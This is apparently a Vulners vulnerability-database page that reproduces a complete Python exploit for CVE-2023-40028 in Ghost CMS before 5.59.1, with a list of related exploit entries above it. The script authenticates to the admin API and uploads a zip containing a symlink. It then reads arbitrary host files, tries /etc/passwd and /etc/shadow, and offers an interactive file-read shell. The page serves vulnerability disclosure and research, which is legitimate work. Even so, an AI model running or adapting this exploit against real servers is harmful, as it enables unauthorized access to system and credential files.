Vulners
Lucene search
Ghost CMS 5.59.1 - Arbitrary File Read
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | Exploit for Path Traversal in Ghost | 21 Dec 202401:53 | – | githubexploit |
| Exploit for Path Traversal in Ghost | 12 Dec 202418:50 | – | githubexploit |
| Exploit for Path Traversal in Ghost | 21 Dec 202401:53 | – | githubexploit |
| Exploit for Path Traversal in Ghost | 7 Mar 202500:48 | – | githubexploit |
| Exploit for Path Traversal in Ghost | 20 Jan 202522:01 | – | githubexploit |
| Exploit for Path Traversal in Ghost | 13 Dec 202411:42 | – | githubexploit |
| Exploit for Path Traversal in Ghost | 28 Dec 202421:17 | – | githubexploit |
| Exploit for Path Traversal in Ghost | 23 Mar 202415:25 | – | githubexploit |
| Exploit for Path Traversal in Ghost | 14 Apr 202516:14 | – | githubexploit |
 | CVE-2023-40028 | 7 Mar 202510:00 | – | circl |
10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# Exploit Title: Ghost CMS 5.59.1 - Arbitrary File Read
# Date: 2023-09-20
# Exploit Author: ibrahimsql (https://github.com/ibrahmsql)
# Vendor Homepage: https://ghost.org
# Software Link: https://github.com/TryGhost/Ghost
# Version: < 5.59.1
# Tested on: Ubuntu 20.04 LTS, Windows 10, macOS Big Sur
# CVE: CVE-2023-40028
# Category: Web Application Security
# CVSS Score: 6.5 (Medium)
# Description:
# Ghost CMS versions prior to 5.59.1 contain a vulnerability that allows authenticated users
# to upload files that are symlinks. This can be exploited to perform arbitrary file reads
# of any file on the host operating system. The vulnerability exists in the file upload
# mechanism which improperly validates symlink files, allowing attackers to access files
# outside the intended directory structure through symlink traversal.
# Requirements: requests>=2.28.1, zipfile, tempfile
# Usage Examples:
# python3 CVE-2023-40028.py http://localhost:2368 [email protected] password123
# python3 CVE-2023-40028.py https://ghost.example.com [email protected] mypassword
# Interactive Usage:
# After running the script, you can use the interactive shell to read files:
# file> /etc/passwd
# file> /etc/shadow
# file> /var/log/ghost/ghost.log
# file> exit
"""
import requests
import sys
import os
import tempfile
import zipfile
import random
import string
from typing import Optional
class ExploitResult:
def __init__(self):
self.success = False
self.file_content = ""
self.status_code = 0
self.description = "Ghost CMS < 5.59.1 allows authenticated users to upload symlink files for arbitrary file read"
self.severity = "Medium"
class GhostArbitraryFileRead:
def __init__(self, ghost_url: str, username: str, password: str, verbose: bool = True):
self.ghost_url = ghost_url.rstrip('/')
self.username = username
self.password = password
self.verbose = verbose
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.9'
})
self.api_url = f"{self.ghost_url}/ghost/api/v3/admin"
def authenticate(self) -> bool:
"""Authenticate with Ghost CMS admin panel"""
login_data = {
'username': self.username,
'password': self.password
}
headers = {
'Origin': self.ghost_url,
'Accept-Version': 'v3.0',
'Content-Type': 'application/json'
}
try:
response = self.session.post(
f"{self.api_url}/session/",
json=login_data,
headers=headers,
timeout=10
)
if response.status_code == 201:
if self.verbose:
print("[+] Successfully authenticated with Ghost CMS")
return True
else:
if self.verbose:
print(f"[-] Authentication failed: {response.status_code}")
return False
except requests.RequestException as e:
if self.verbose:
print(f"[-] Authentication error: {e}")
return False
def generate_random_name(self, length: int = 13) -> str:
"""Generate random string for image name"""
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
def create_exploit_zip(self, target_file: str) -> Optional[str]:
"""Create exploit zip file with symlink"""
try:
# Create temporary directory
temp_dir = tempfile.mkdtemp()
exploit_dir = os.path.join(temp_dir, 'exploit')
images_dir = os.path.join(exploit_dir, 'content', 'images', '2024')
os.makedirs(images_dir, exist_ok=True)
# Generate random image name
image_name = f"{self.generate_random_name()}.png"
symlink_path = os.path.join(images_dir, image_name)
# Create symlink to target file
os.symlink(target_file, symlink_path)
# Create zip file
zip_path = os.path.join(temp_dir, 'exploit.zip')
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
for root, dirs, files in os.walk(exploit_dir):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, temp_dir)
zipf.write(file_path, arcname)
return zip_path, image_name
except Exception as e:
if self.verbose:
print(f"[-] Error creating exploit zip: {e}")
return None, None
def upload_exploit(self, zip_path: str) -> bool:
"""Upload exploit zip file to Ghost CMS"""
try:
headers = {
'X-Ghost-Version': '5.58',
'X-Requested-With': 'XMLHttpRequest',
'Origin': self.ghost_url,
'Referer': f"{self.ghost_url}/ghost/"
}
with open(zip_path, 'rb') as f:
files = {
'importfile': ('exploit.zip', f, 'application/zip')
}
response = self.session.post(
f"{self.api_url}/db",
files=files,
headers=headers,
timeout=30
)
if response.status_code in [200, 201]:
if self.verbose:
print("[+] Exploit zip uploaded successfully")
return True
else:
if self.verbose:
print(f"[-] Upload failed: {response.status_code}")
return False
except requests.RequestException as e:
if self.verbose:
print(f"[-] Upload error: {e}")
return False
def read_file(self, target_file: str) -> ExploitResult:
"""Read arbitrary file using symlink upload"""
result = ExploitResult()
if not self.authenticate():
return result
if self.verbose:
print(f"[*] Attempting to read file: {target_file}")
# Create exploit zip
zip_path, image_name = self.create_exploit_zip(target_file)
if not zip_path:
return result
try:
# Upload exploit
if self.upload_exploit(zip_path):
# Try to access the symlinked file
file_url = f"{self.ghost_url}/content/images/2024/{image_name}"
response = self.session.get(file_url, timeout=10)
if response.status_code == 200 and len(response.text) > 0:
result.success = True
result.file_content = response.text
result.status_code = response.status_code
if self.verbose:
print(f"[+] Successfully read file: {target_file}")
print(f"[+] File content length: {len(response.text)} bytes")
else:
if self.verbose:
print(f"[-] Failed to read file: {response.status_code}")
except Exception as e:
if self.verbose:
print(f"[-] Error during exploit: {e}")
finally:
# Cleanup
try:
if zip_path and os.path.exists(zip_path):
os.remove(zip_path)
temp_dir = os.path.dirname(zip_path) if zip_path else None
if temp_dir and os.path.exists(temp_dir):
import shutil
shutil.rmtree(temp_dir)
except:
pass
return result
def interactive_shell(self):
"""Interactive shell for file reading"""
print("\n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Shell ===")
print("Enter file paths to read (type 'exit' to quit)")
while True:
try:
file_path = input("file> ").strip()
if file_path.lower() == 'exit':
print("Bye Bye!")
break
if not file_path:
print("Please enter a file path")
continue
if ' ' in file_path:
print("Please enter full file path without spaces")
continue
result = self.read_file(file_path)
if result.success:
print(f"\n--- Content of {file_path} ---")
print(result.file_content)
print("--- End of file ---\n")
else:
print(f"Failed to read file: {file_path}")
except KeyboardInterrupt:
print("\nExiting...")
break
except Exception as e:
print(f"Error: {e}")
def main():
if len(sys.argv) != 4:
print("Usage: python3 CVE-2023-40028.py <ghost_url> <username> <password>")
print("Example: python3 CVE-2023-40028.py http://localhost:2368 [email protected] password123")
return
ghost_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
exploit = GhostArbitraryFileRead(ghost_url, username, password, verbose=True)
# Test with common sensitive files
test_files = [
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/proc/version",
"/var/log/ghost/ghost.log"
]
print("\n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Exploit ===")
print(f"Target: {ghost_url}")
print(f"Username: {username}")
# Test authentication first
if not exploit.authenticate():
print("[-] Authentication failed. Please check credentials.")
return
print("\n[*] Testing common sensitive files...")
for test_file in test_files:
result = exploit.read_file(test_file)
if result.success:
print(f"[+] Successfully read: {test_file}")
print(f" Content preview: {result.file_content[:100]}...")
else:
print(f"[-] Failed to read: {test_file}")
# Start interactive shell
exploit.interactive_shell()
if __name__ == "__main__":
main()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Aug 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.14.9 - 6.5
EPSS0.77606
SSVC